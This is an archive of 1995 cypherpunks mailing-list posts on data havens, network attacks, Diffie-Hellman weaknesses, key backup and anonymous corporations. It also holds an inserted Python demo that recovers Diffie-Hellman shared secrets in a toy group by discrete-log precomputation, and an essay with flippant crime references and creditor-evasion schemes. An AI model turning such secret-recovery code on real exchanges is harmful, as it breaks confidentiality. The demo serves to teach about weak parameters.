( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 18 Jan 95 11:33:16 PST
To: Michael Handler <grendel@netaxs.com>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Pine.SUN.3.91.950117183343.17037A-100000@unix3.netaxs.com>
Message-ID: <Pine.SV4.3.91.950118141828.7755B-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> 	I could write a procmail recipe and a script in about an hour to
> automatically secret-share-split and redistribute the incoming submission.

   I'll wager most of us could.  Question: whom would you redistribute it 
_TO_?  This seems to be the stumbling block - who is willing to store the 
data on their machine or net account?  Speaking as someone with about 
300k of quota left, it certainly couldn't be me, though I'd be willing to 
handle the frontend interfacing work.

   How would you handle retrieval of the data?  

> If the authorities attempt to indict you for possessing illegal
> information / kiddie porn / whatnot, they have to prove that you
> interfered with the automatic redistribution process and examined the
> contents of the submission. If you in fact did not look at the submission,
> they would have a difficult time doing so. 

   Unfortunately I've found that the U.S. government especially can make 
your life a living hell if you don't go along with their desires, even if 
you're following all the laws.  Trumped-up charges.  Fake charges.  I 
wouldn't put much past our government.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 18 Jan 95 11:34:29 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: (none)
In-Reply-To: <Pine.3.89.9501181033.A15911-0100000@netcom10>
Message-ID: <9501181934.AA02176@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" says:
> On Wed, 18 Jan 1995, Perry E. Metzger wrote:
> > Be that as it may, people HAVE been kicked off for mischief like
> > forging routing packets -- and if someone started hosing me down with
> > any one of several really nasty packet based attacks I'm familiar with
> > I would expect action to be taken against them.
> 
> Unix is broken.  Windows and DOS are fragile and under construction.

This has nothing to do with Unix, Mr. Donald. This has to do with the
nature of internet protocols.

> Servers should have built in limits, that cause them to spit back
> packets from unknown clients that are unreasonable or strain the
> system.

Can't be done. Sorry. There are certain flaws in the design of the
internet protocols down on the transport layer that I'd rather not get
into because they don't seem to be widely known and I'm not interested
in making them better known.

> For example an SMTP server should have a default limit on volume
> per address and per client, with the user being able to vary
> such limits for particular clients or addresses -- trusted or
> hostile clients.

Sendmail already has such limits. Unfortunately they ultimately do no
good. I'd try explaining, but the details get too technical -- if
people insist I'll get into it. The gist is, however, that in the
current network it's too easy to fake connections. Even with per client
limits I could still make your machine die a horrible death.

> At present most unix utilities have arbitrary fixed length internal
> buffers for processing variable length fields.  If you overflow 
> the buffer by sending pathological data you will crash the system. 

Not usually, actually. The "utilities" have nothing to do with the
kernel, and the kernel is what can crash the machine.

> If you know machine code, and you overflow the buffer with 
> carefully chosen data then instead of a random crash you can
> get the server to do some particular unexpected thing -- for
> example the internet worm caused the server to execute a
> file that the mail server had just received.

Those sorts of security problems are not only well known but largely
gone. The last one, in sendmail's debug flag, could only hurt a
machine by action of a user on the machine itself, not over the
network. The sorts of things I'm talking about are *inherent* in the
design of TCP and cannot be altered at this point.

> > I doubt it. It really hasn't proved to be an actual problem thus
> > far. If anything, the limiting factor on scalability is the fact that
> > the net has no locality of reference, which is making routing design
> > harder and harder. Routing is currently THE big unsolved problem on
> > the net -- something outsiders to the IETF rarely suspect, because the
> > engineers have been faking it so well for so long. Unfortunately, all
> > the good solutions to the routing problem are mathematically
> > intractable -- and the practical ones are leading to bad potential
> > long term problems..
> 
> This is inaccurate.  Optimal solutions to the routing problem are
> mathematically intractable.  Tolerable solutions are mathematically
> tractable.

Name one, Mr. Donald. Name a single one.

> For realistic routing problems, tractable approximations
> are only worse than an optimal solution by a modest factor.

Sorry, but you just don't know what you are talking about here,
period. We don't know how to solve the routing problem in the general
case. That's one of the reasons for all the arguments in the IETF
concerning the problems we are getting ourselves into with route
aggregation.

(Just so you are clear here, Mr. Donald, the routing problem is NOT
the problem of finding an optimal path between all pairs of nodes on a
network in polynomial time -- that's solved and absolutely useless.)

> Of course I am sure Perry is correct when he says that
> the tractable approximations that we are currently using 
> fail to scale, but this is not a fundamental unsolved 
> problem in mathematics -- it is merely yet another bug.

Nope, not a bug. There are problems that we don't know how to
solve.

The problem is routing aggregation, you understand, and the fact that
aggregated clouds don't really experience locality of reference. This
means that we end up with nasty and totally artificial network choke
points as the networks scale. If we transmit full information,
however, we no longer get aggregation and can no longer store the
tables because they are too big.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Johnson second login <exabyte!gedora!mikej2@uunet.uu.net>
Date: Thu, 19 Jan 95 01:12:38 PST
To: gedora!uunet!ingr.com!perobich@uunet.uu.net
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501121547.AA02187@poboy.b17c.ingr.com>
Message-ID: <Pine.3.89.9501181433.A14495-0100000@gedora>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Jan 1995, Paul Robichaux wrote:

> > But selecting a single cipher is just as much a fixed policy as a
> > randomly selected one is.  Far better to let the user pick a policy,
> > both about sent and accepted ciphers.
> 
> If you do give the user control, what is an acceptable mechanical
> implementation? Let's say I have a file encryptor which allows the
> user to choose between DES, 3DES, IDEA, Diamond, and RC5. Must I
> require the user to tell that program what cypher was used to encrypt
> the file she wishes to decrypt?
> 
> Is storing the cypher type as part of the encrypted file a weakness?

Perhaps it is.  The algorithm set could be part of the key, though...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 18 Jan 95 12:14:06 PST
To: Lucky Green <shamrock@netcom.com>
Subject: Re: What is this? Anonymous message failed
In-Reply-To: <v01510108ab4279f1317d@[192.0.2.1]>
Message-ID: <9501182012.AA11306@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 18 Jan 1995 09:59:54 -0800
    From: Lucky Green <shamrock@netcom.com>

    Just got back a message from Julf's remailer that my Anonymous
    message failed (wrong password). Needless to say, I didn't try to
    send one through the remailer. The message it was referring to is
    the one I sent to the list earlier. Is this a repeat of the an/na
    problems we had in the past?

Yes.  The bounce message that I got back included this header line:

  X-Envelope-To: an157790

I sent a message to <na157790@anon.penet.fi> and got back a reply
stating that the person had unsubscribed hirself and may resubscribe
``in the clear''.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 18 Jan 95 13:51:11 PST
To: jalicqui@prairienet.org (Jeff Licquia)
Subject: Re: EE Times on PRZ
Message-ID: <9501182146.AA03035@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


jalicqui@prairienet.org (Jeff Licquia) wrote:
>  It was my impression that DH had a further weakness not related to
>  the difficulty of the hard problem.  As my copy of Schneier is at
>  home, I must defer to ignorance at this point.

My understanding is that once you do the computation to solve a DH exchange
you can use that information to easily solve any exchange under the same
generator and modulus.  So it's important to at least use large enough
numbers to make this infeasible.  I think it was Sun's SecureRPC that shipped
with a fixed (and not big enough) generator and modulus and was not secure
(assuming someone had already done the pre-computation).  Maybe this is what
you were thinking of?

As always, proper generation of components is an important consideration in  
implementing public-key systems.


andrew
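
The reuse described in the message above, as an added example that is not part of the original post: a baby-step/giant-step table is built once for a fixed generator and modulus, and every later exchange in that group is then solved with a short walk against the same table. The 31-bit prime, the generator 7 and the names GroupTable, exchange and recover_shared are assumptions chosen for illustration; baby-step/giant-step is a textbook method used here to show the amortization, not the computation used against any real system.

```python
"""Toy model: discrete-log precomputation belongs to (g, p), not to one exchange."""
import secrets

P = 2**31 - 1   # toy modulus (a Mersenne prime); far too small for real use
G = 7           # a primitive root modulo P


class GroupTable:
    """Baby-step table for one fixed (g, p). Built once, reused for every target."""

    def __init__(self, g, p, table_bits=18):
        self.g, self.p = g, p
        self.m = 1 << table_bits
        self.table = {}
        cur = 1
        for j in range(self.m):            # store g^j -> j for j in [0, m)
            self.table.setdefault(cur, j)
            cur = cur * g % p
        self.precompute_cost = self.m      # modular multiplications spent once
        # cur is now g^m; its inverse (by Fermat) is one giant step.
        self.giant = pow(cur, p - 2, p)
        self.max_giant_steps = -(-(p - 1) // self.m)

    def dlog(self, h):
        """Return (x, steps) such that g^x == h (mod p)."""
        gamma = h % self.p
        for i in range(self.max_giant_steps + 1):
            j = self.table.get(gamma)
            if j is not None:
                return i * self.m + j, i + 1
            gamma = gamma * self.giant % self.p
        raise ValueError("h is not a power of g")


def exchange(g, p):
    """One Diffie-Hellman run. Returns the public transcript and the secret."""
    a = secrets.randbelow(p - 3) + 2       # private exponents in [2, p-2]
    b = secrets.randbelow(p - 3) + 2
    A, B = pow(g, a, p), pow(g, b, p)
    return (A, B), pow(B, a, p)


def recover_shared(table, A, B):
    """Derive the shared secret from the public values using the shared table."""
    x, steps = table.dlog(A)               # g^x == A, so B^x == g^(b*x) == A^b
    return pow(B, x, table.p), steps


if __name__ == "__main__":
    table = GroupTable(G, P)
    print("one-time table cost:", table.precompute_cost, "multiplications")
    for n in range(5):
        (A, B), shared = exchange(G, P)
        guess, steps = recover_shared(table, A, B)
        print(f"exchange {n}: recovered={guess == shared} in {steps} steps")
```

Every exchange costs at most a few thousand steps after the one-time table, which is why a fixed group has to be large enough that the table itself can never be built.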




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 18 Jan 95 13:27:32 PST
To: cypherpunks@toad.com
Subject: Threats in real life - what are we worried about?
Message-ID: <9501182129.AA18239@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
> TEMPEST has very little to do with Cypherpunks goals, actually. First,
> buying such a gadget, tweaking it, exploring capabilities, etc., would
> lead to what? The ability to park a van in front of someone's house
> and--maybe--monitor their screens? We already know this is possible.
> (You all knew that, didn't you?)

I disagree.  "TEMPEST" risks and countermeasures are but one entry on
a long list of subjects in which our ignorance (and that of the
civilian security community in general) may well come back to bite us.
Granted, this is the "cypherpunks" list, not the "securitypunks" list,
but it behooves anybody interested in developing strong mechanisms to
accomplish some security objective to be at least acquainted with how
those mechanisms fit in the larger picture.

One of the most dangerous aspects of cryptology (more dangerous,
perhaps, than the fact that there are almost no solid theorems that tell us
how secure practical ciphers really are) is that you can measure it.
It's all too tempting to misuse an estimate for the cryptographic work
factor for some cipher as if it were some kind of overall security
metric for the systems in which it is deployed.  In real life, there
are lots of ways to violate system security, including cryptanalysis,
protocol attacks, Trojan horses, viruses, electromagnetic monitoring,
physical compromise, rubber hose cryptanalysis, OS bug exploitation,
application bug exploitation, hardware bug exploitation, user error
exploitation, physical monitoring, social engineering, court orders,
dumpster diving, and so on and so on.  Most of us on the list like to
think about cryptography and cryptographic protocols, and that's fine,
but it isn't the same as thinking about building secure systems that
are strong enough to withstand attackers who aren't willing to
restrict themselves to a strictly cryptographic threat model.

Unfortunately, the world outside the cypherpunks list isn't much
better off than we are in understanding these "informal", but all too
real, threats.  Thinking about some of them would, I think, go a long
way toward contributing to "Cypherpunk goals" as I understand them.
(Practical TEMPEST shielding is one such problem.  Another good one is
the almost completely ignored problem of storing secret keys on
networked computers.  Still another is the problem of using security
software remotely with limited local computation.  There are lots
more.)

That said, no one can force these discussions to happen, and no one,
much less me, has a right to complain that everyone else is talking
about the "wrong stuff".  So let me raise a question:
	
	Given existing crypto tools (PGP, etc), what are the top ten
	practical attacks against the privacy of stored data and
	electronic mail?  Who are the bad guys? What tools do we need
	to limit these threats?

I'll post my own thoughts later.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 18 Jan 95 16:39:11 PST
To: cypherpunks@toad.com
Subject: Good "Economist" article on Cyberspace
Message-ID: <199501190038.QAA23631@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[I'm getting no Cypherpunks list traffic today, only mail sent to me
directly, so I apologize if this has come up already.]

The Jan 14-20 issue of "The Economist" has a good article on "Who
speaks for cyberspace?,"  which does a good job of summarizing the
civil libertarian arguments and why the EFF "imploded."

...

"Little wonder that many Internet pioneers thought they had stumbled
upon an electronic Utopia....If a single set of beliefs can be said to
dominate the politics of cyberspace, it is radical libertarianism..."

About the withdrawal of the EFF from the political fray:

"That leaves cyberspace's radical libertarians without a voice in
Washington. They're probably delighted."

I know I am.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 18 Jan 95 14:01:12 PST
To: dcwill@ee.unr.edu (Dr. D.C. Williams)
Subject: Re: Key backup (was: How do I know . ..)
In-Reply-To: <199501181754.MAA24686@bb.hks.net>
Message-ID: <199501182200.RAA08888@freud.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


D.C. Williams wrote:

| With barcoding as the standard, another person prints his key on a small
| unmarked card and hides it somewhere deemed to be secure by him. The
| UPC-label attack fails because his keyring isn't disguised as UPC product
| labels. How does the attacker know what to look for?
| 
| True Paranoids could devise some sort of "invisible ink" method,
| requiring UV or heat exposure before the barcode becomes visible.
| Now your backup key looks like a blank sheet of paper. ;-)

	Picking a few nits:

	Putting the UPC's on things other than cards (such as books)
makes it easier to hide in the open.  `UPC' stickers on, say, a few
books are easier to miss than UPC stickers on index cards.

	Invisible ink draws attention to the correct UPC's once they
know you're using it.  See Kahn for a discussion of secret inks being
developed during the second world war.  If you want to hide bits, they
should be stripped of low entropy parts and hidden with a stego
program.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Wed, 18 Jan 95 16:37:19 PST
To: grendel@netaxs.com
Subject: Re: Another problem w/Data Havens...
Message-ID: <v02110100ab435e5f6310@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:33 PM 1/18/95, Paul J. Ste. Marie wrote:
>[. . .] As long as
>some piece of info is considered to be a thought-crime, everyone who accepts
>info from a wide range of sources is at risk.

We might have a test case right now for part of that idea--the
Scientologists. They're essentially claiming that the various newsgroups
should be shut down because somebody put thoughtcrime on them. I would
posit that the operator of any automated data transmission/massaging
service is not responsible for the data that passes through her equipment.
Consider, for example, if I used a bang path to route an illicit email note
through, say, apple.com. Does that make Apple Computer responsible for what
I send?

Tying in with some of Eric's comments, this could be viewed as a
fundamental flaw in the 'net: it's the sender, generally, who initiates and
controls the connection, not the recipient. We could view this as an
advantage: how can you blame me for what somebody else does to my computer
without my knowledge, especially if I have no way to stop it short of
getting off the 'net completely?

>> ... The service could even be advertised as a different form of timestamping
>>(or notarizing). Not only do you get the file back signed, but you get it
>>back encrypted and signed. ...
>
>That would still be a useful service, however, but it does transfer the risk
>from the DH operator to the encryptor.  Since he isn't leaving evidence on a
>hard drive, his window of vulnerability is somewhat less.

Less to nonexistent. If no human sees it on the encrypting site, no human
can be responsible for it. "They" would have to ban the service outright,
or try to prove that you knew that your site would be used for illicit
purposes. If putting a warning to not export crypto software on an ftp site
is sufficient protection--and, judging from the number of sites which do no
more than that, it is--then a simple statement that the service is not to
be used for any illegal purpose should do fine here.

>    --Paul J. Ste. Marie
>      pstemari@well.sf.ca.us, pstemari@erinet.com

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 18 Jan 95 15:42:52 PST
To: grendel@netaxs.com
Subject: Re: Another problem w/Data Havens...
Message-ID: <9501182333.AA09451@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:05 PM 1/17/95 -0700, Ben.Goren@asu.edu wrote:
> ... That's the main reason why I like my idea of having a trusted encryptor.
>Nobody's suggested that the current timestamp operators would be in Deep
>Doo-Doo if they timestamped some piece of thoughtcrime; why should
>somebody who encrypts be any different? ...

Quite possibly the timestampers would be in trouble, the risk for them is 
the same as the risk for the remailers and the DH operators.  As long as 
some piece of info is considered to be a thought-crime, everyone who accepts 
info from a wide range of sources is at risk.

> ... The service could even be advertised as a different form of timestamping
>(or notarizing). Not only do you get the file back signed, but you get it
>back encrypted and signed. ...

That would still be a useful service, however, but it does transfer the risk 
from the DH operator to the encryptor.  Since he isn't leaving evidence on a 
hard drive, his window of vulnerability is somewhat less.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 18 Jan 95 16:24:19 PST
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Does encrypted equal safe?
Message-ID: <9501182334.AB09451@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:55 PM 1/17/95, Sandy Sandfort wrote:
> ... In my law school they taught that the burden of proof in a 
>criminal case was on the government.

Unless of course the case involves porn, drugs, etc, in which case the 
current practice in the American legal system places the onus on the 
accused, regardless of what the Constitution requires.  Civil forfeiture is 
a fine example of this, along with requiring porn producers to demonstrate 
the age of their models, etc ad nauseam.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@ee.unr.edu>
Date: Wed, 18 Jan 95 15:53:40 PST
To: cypherpunks@toad.com
Subject: Re: Key backup (was: How do I know . ..)
Message-ID: <199501182358.SAA29305@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

'Adam Shostack' was reported to have written:

> 	Putting the UPC's on things other than cards (such as books)
> makes it easier to hide in the open.  `UPC' stickers on, say, a few
> books are easier to miss than UPC stickers on index cards.

Exactly. If the intention is to keep them out in the open, then
making labels which resemble UPCs is preferred. However, if I'm
going to dig a hole in the ground at a secret location and bury my
barcoded key in a special container, a different format might be
indicated.

> 	Invisible ink draws attention to the correct UPC's once they
> know you're using it.  See Kahn for a discussion of secret inks being
> developed during the second world war. 

I'll do that, but I think you might be intermixing ideas. Pseudo-UPCs in
invisible ink wouldn't be a good combination. Pseudo-UPCs should 
probably be printed exactly like normal UPCs. If you want the "invisible
ink" process, it should probably blend into the ambient environment as
much as possible. Even if "they" know you're using secret ink, don't "they"
have to find the printed key first? How much work is required to check
every page of every book and every sheet of paper you might have access
to? You could mail your key anywhere in the world invisibly printed on 
the outside of an envelope. Better yet, send someone a special document
(wedding announcement, legal document, 21st birthday card, whatever;
the important part is to send something that the recipient will keep)
with your keyring invisibly printed on it. 

Variations on this theme (there are many) are encouraged. Have a friend
check out a library book and let you stamp your key somewhere inside. It's
the number of possible variations that make this seemingly impossible to
attack. Apologies if this "secret ink" stuff is way off base  ;-) .

Most people (myself included) would opt for the "split and
disguise" or "hidden/buried" key schemes where secret ink wouldn't add
much security.

> If you want to hide bits, they
> should be stripped of low entropy parts and hidden with a stego
> program.

The idea was to use something other than magnetic media. A new and
different optical encoding method could be devised to hide a key in a 
halftone, but the barcode example was offered as one possibility using
an existing standard. The basis for this thread was the perceived need
for a relatively simple key backup system that didn't require the active
participation of a whole horde of people.


=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLx2rEyoZzwIn1bdtAQEBVAGAzJc1fOAchLGEIlnbQBiJXV2cICE2WK8e
8FnXnP8ztcWEdUCYY0vjDewiLI2iW4bt
=tUR2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Tue, 17 Jan 95 22:06:49 PST
To: cypherpunks@toad.com
Subject: Anonymous corporations (a work in progress...)
Message-ID: <199501180604.TAA02052@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


0. Introduction

It's been a lucrative month, ecash-wise, what with consulting for some 
anonymous Mafia don, selling those kiddieporn mpegs and killing that guy who 
cut Tim May off in the parking lot at the mall. So lucrative, in fact, you 
don't want those digidollars just sitting around on your hard drive -- you 
want them to be earning you something.

The answer, of course, is to invest them in an anonymous corporation.

1. The structure of anonymous corporations

1.1 Outline

An anonymous corporation provides an intersection between the real [a term 
used throughout purely in order to deconstruct it] and digital worlds, a 
point of contact between the e-economy and the real one.

The corporation itself is known: a genuine Delaware/Bahamas/Cayman Islands 
etc corporation, able to own property, to make contracts, to sue (and be 
sued) in the courts and with all the normal rights (and liabilities) of the 
(corporate) citizen.

But the (controlling) investors in the corporation (basically, the 
stockholders) are anonymous. The investment comes in from the stockholders 
in the form of ecash, and is transformed by the company into real money and 
investments.

Because the investors are anonymous and (assuming) the ecash is untraceable, 
truly anonymous control of real assets can be exercised.

1.2 Legal structure

The structure has two parts: a corporation and a trustee.

The corporation is just a normal corporation with directors typically 
supplied by the trustee company that administers the corporation. [Note: the 
trustee company will need assurance that its fees will be paid, and that its 
directors are sufficiently indemnified. See below for discussion on whether 
this is possible under an anonymous structure.] The corporation issues 
shares to the trustee.

The trustee (typically a trustee company - but a different one to that 
administering the company) holds the shares on trust for the anonymous 
beneficiaries. A beneficiary is defined as a person who, for the time being, 
holds an eshare in the trust. Each eshare gives the holder the right to 
direct the trustee on how to vote one of the trustee's shares, the right to 
receive the dividend income of one of the trustee's shares, the right to 
receive any distribution due to one of the trustee's shares (eg on the 
dissolution of the corporation), and the right to participate in the 
enforcement of duties owed to stockholders. That is, each eshare in the 
trust mirrors a share in the corporation.

The two part structure isolates the anonymity from the vagaries of corporate 
law: the register of stockholders of the company will truthfully show the 
Completely Legitimate Perpetual Trustee Company, Inc (or whatever). It also 
deals with the classic corporate agency problem (the separation of ownership 
and control) by allowing the anonymous e-stockholders to enforce their 
rights against (ie sue) the corporation or its management without breaking 
cover -- the trustee is bound by its deed to take the necessary action at 
the (reasonable) behest of the anonymous e-stockholders.

The agency situation is not ideal. Particularly with regard to ensuring that 
the *trustee* performs (including the possibility of collusion between 
directors and trustee), matters of reputation (including the possibility 
that an e-stockholder is a competitor or a testing agency) will be relevant. 
(And, of course, there is the possibility that one or more of the 
e-stockholders is in turn an anonymous corporation, with full rights to sue, 
and no problem with being unmasked.)

Agency problems can be minimised by restricting the operations of the 
corporation. Where the corporation merely holds units in a mutual fund, or a 
piece of real estate, or perhaps even shares in another corporation, the 
directors' duties will be minimal -- the corporation acting as a conduit 
only. When the anonymous corporation is undertaking a real business, when 
management has to be hands on and day to day (ie when there is a greater 
disparity of information between management and owners) the chances of 
default by management are probably much greater. Structures could be 
developed to manage this risk.

Note that the anonymous corporation can have any number of e-stockholders, 
from one upwards.

1.3 Technical requirements

The establishment of an anonymous corporation has a number of cryptographic 
requirements:

a) The ready availability of untraceable ecash able to be transformed into 
real money. This could involve a scheme whereby the ebank was unable to know 
which edollars had been issued to which customer, followed by anonymous 
transfer of edollars (ie the bank doesn't know the identity of the 
transferor or the transferee). That is, some flavor of Chaumian system where 
double spending is eliminated by on-line settlement of transfers. The ebank 
would redeem ecash for real dollars. [This, of course, is more of a systemic 
than a cryptographic requirement.]

b) A method for the anonymous issue/subscription of eshares.

c) A method for the anonymous transfer of eshares (with protections against 
'double spending'). These two requirements are essentially a variation on 
the ecash scheme above.

d) A method for secondary market purchasers of eshares to verify which 
company the eshare belongs to.

e) A method for the holders of eshares to vote anonymously.

f) A method for distributing dividends etc to e-stockholders. Perhaps the 
trustee publicly posts an encrypted message. Each eshare acts as a key to 
decrypt one part of the message, revealing ecash (or, in the case of a bonus 
issue of stock, or a stock split, or even a merger, eshares etc). If an 
e-stockholder has more than one share, they will be able to decrypt more 
than one part (ie each part of the message corresponds to one eshare).

In the case of a widely held corporation, information (accounts, voting 
forms etc) can be distributed publicly. In the case of closely held 
corporations (where stockholders are more intimately concerned with 
management) sensitive information could be encrypted for each e-stockholder.

In order to provide maximum flexibility, an anonymous corporation should be 
able to issue many millions of eshares. Similarly, an e-stockholder should 
ideally be able to hold many millions of eshares.

2. Implications

2.1 Implications for the structure

The key (no pun intended) feature of anonymous corporations is, of course, 
that the stockholders (in the beneficial/equitable sense, ie the 
e-stockholders) are not known, and cannot be sued. In so far as corporations 
generally provide limited liability to stockholders anyway, this is not too 
radical a change (and may deflect some criticism). However, it does have 
some repercussions.

a) The anonymity of stockholders will deter creditors.

One of the protections that creditors of a corporation have is that if the 
corporation is unable to pay them, but it has made a payment to the 
stockholders, the creditors can recover the money paid to the stockholders 
as a fraudulent conveyance (or similar). With an anonymous corporation, once 
a payment has been made to stockholders, it is unrecoverable.

In order to encourage lenders to extend credit, the corporation could offer 
to secure the loan (with traceable property [ie if the corporation doesn't 
pay, and deals with the property, the lender can find the property, take it, 
and sell it to cover the unpaid debt], or by pledge [the corporation leaves 
the property with the lender, so if the debt isn't paid the lender can sell 
the property without having to trace it first]). Alternatively, the income 
stream of the company could be encumbered in such a way that creditors had 
to be paid out before stockholders. In general, many of the techniques of 
project financing will be relevant to attracting debt finance.

Trade creditors, especially the directors and the trustee, will also require 
comfort that their bills will be paid and any liability covered. Some 
combination of up front payments, insurance and recourse to the assets of 
the corporation may be enough.

b) The anonymity of stockholders will affect other stockholders

Stockholders sometimes owe duties to other stockholders. In so far as these 
duties extend to e-stockholders (who hold the equitable, but not the legal 
title to the shares) they will be effectively unenforceable [except for the 
possibility of injunctive relief...]. Thus majorities may have more freedom 
in dealing with minorities [in some situations], possibly leading to a 
higher premium for control, and insider trading will be undetectable, 
leading to a more accurate market price for the e-stock (and all other stock).

c) The anonymity of shareholders may be prejudicial

A number of regulatory tests depend upon the identity of (beneficial) 
shareholders, for example tests of foreign control in investment and tax 
laws. Anonymous companies may find that the onus is on them to prove that 
they do not fall into an undesirable category. This will, typically, be 
impossible.

d) The complexity of the structure has a significant cost

As compared with directly owning an asset, owning an asset via an anonymous 
corporation is incredibly costly. There are two layers of fees (to directors 
and to the trustee) and possibly even two layers of tax (at corporation and 
trust levels) to pay on any income, quite apart from the set up costs and 
the administration of the technical/cryptographic structure. Then there is 
the cost in time and effort of monitoring the structure to see that nothing 
is going wrong (the agency cost). And, of course, e-shares are also likely 
to be significantly less liquid than ecash or the assets held by the 
corporation.

And the risk of holding assets via such a structure (default by directors or 
trustee, discovery by traffic analysis, government confiscation of all 
anonymous corporations) must be weighed against the risk/return involved in, 
on the one hand, transforming the ecash into real cash oneself, and, on the 
other, burying a [heavily encrypted] floppy disk in a coffee tin in the back 
yard.

2.2 Implications for the e-economy

a) Eregistries

Some elements of the anonymous corporation could be shared across instances, 
such as directors, trustee and technical/cryptographic structure. This would 
help to reduce costs (including set-up costs) somewhat. And by separating 
the cypherpunkish element (crypto-struct) from the more general, and already 
existing, elements (ie trust companies), it may assist in selling the idea 
to those pre-existing elements and the investing public [private?].

In other words, just as some corporations use outside services to administer 
their share registers, eregistries would handle the mechanics of eshares. 
Eregistries would make the investment in equipment and bandwidth, and charge 
the issuers of eshares (the trustee) a fee for handling the issue, the 
online settlement of transfers, the distribution of dividends etc. Not only 
does this spread the cost of equipment among corporations, but, if standard 
service packages are offered by the eregistries, greatly simplifies the 
drafting of trust deeds [there is only a need to refer to "the services of 
Cypherpunk eRegistry No1 BV", rather than scary maths].

Such eregistries would need a reputation for reliability, honesty and 
(perhaps) regulatory inaccessibility. [They might also provide an extra 
layer of anonymity, acting as a sort of mixer for transactions -- was that 
message a subscription to that corporation, a transfer of an eshare in this 
one, or a vote on some matter for the other?] And they need not, of course, 
be limited to eshares -- eregistries could provide clearing for edebt and ecash.

b) Secured lending -- extending credit to anonyms

Because eshares represent something real, they have real value. A creditor, 
therefore, should be prepared to lend emoney even to a digital pseudonym on 
the security of a pledge of eshares [ie eshares transferred to lender on 
condition that they be transferred back on repayment of loan]. 

(Another way of leveraging the value of your eportfolio is simply to have 
your anonymous corporation borrow the money: capitalise up a corporation, 
have the corporation buy an asset, and have the corporation borrow real 
money secured on that asset -- the corporation can spend the money or pay it 
to the e-stockholder (you) as a dividend...)

Enabling anonymous credit unlocks more of the value of ecash.

c) Why not edebt -- ecash by another name

As you will have noticed, I have made certain assumptions about how ecash 
works [although these assumptions are probably not necessary for the 
functioning of anonymous corporations]. It is time to make those assumptions 
more explicit.

I see a system whereby the average person buys ecash over the net (or even 
off the street), say using their credit card. In return for a (cleared) 
payment the ebank issues a bucket-o-bits, representing that cash (minus a 
fee?). The ebank (via its eregistry) does not know which digital-dollars go 
to which non-anonymous customer. Transfers of ecash take place anonymously 
